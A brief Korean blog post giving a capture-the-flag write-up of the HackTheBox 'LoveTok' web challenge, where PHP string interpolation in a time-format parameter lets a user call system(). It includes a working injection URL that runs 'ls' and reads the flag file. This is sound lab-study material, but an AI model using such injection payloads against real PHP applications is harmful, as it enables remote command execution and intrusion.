write-ups

HackTheBox LoveTok write-up

2021. 4. 19. 18:10

1980년대 서울역

 문제에 접근하면 제일 처음 이런 화면을 볼 수 있다. 사실 문제 소스가 제공되는 문제이다.

 

 

 format을 입력하면 그에 맞는 포맷으로 시간을 리턴하는 간단한 웹페이지다. 하지만 포맷을 입력할 때 다음과 같은 코드를 사용한다.

 

 

 PHP에서는 string 안에서 변수에 접근하거나 함수를 실행할 수 있기 때문에 system() 함수를 실행할 수 있다. 

 

http://138.68.182.108:31769/?format={$_GET[0]($_GET[1])}&0=system&1=ls+-al+/;cat+/flagmKC78

 

 끝이다.

'write-ups' 카테고리의 다른 글

HackTheBox Heist write-up  (0) 2021.05.10
HackTheBox LoveTok write-up  (0) 2021.04.19
HackTheBox baby website rick write-up  (0) 2021.04.15
HackTheBox baby breaking grad write-up  (0) 2021.04.15
HackTheBox baby todo or not todo write-up  (0) 2021.04.14
HackTheBox baby WAFfles order write-up  (0) 2021.04.14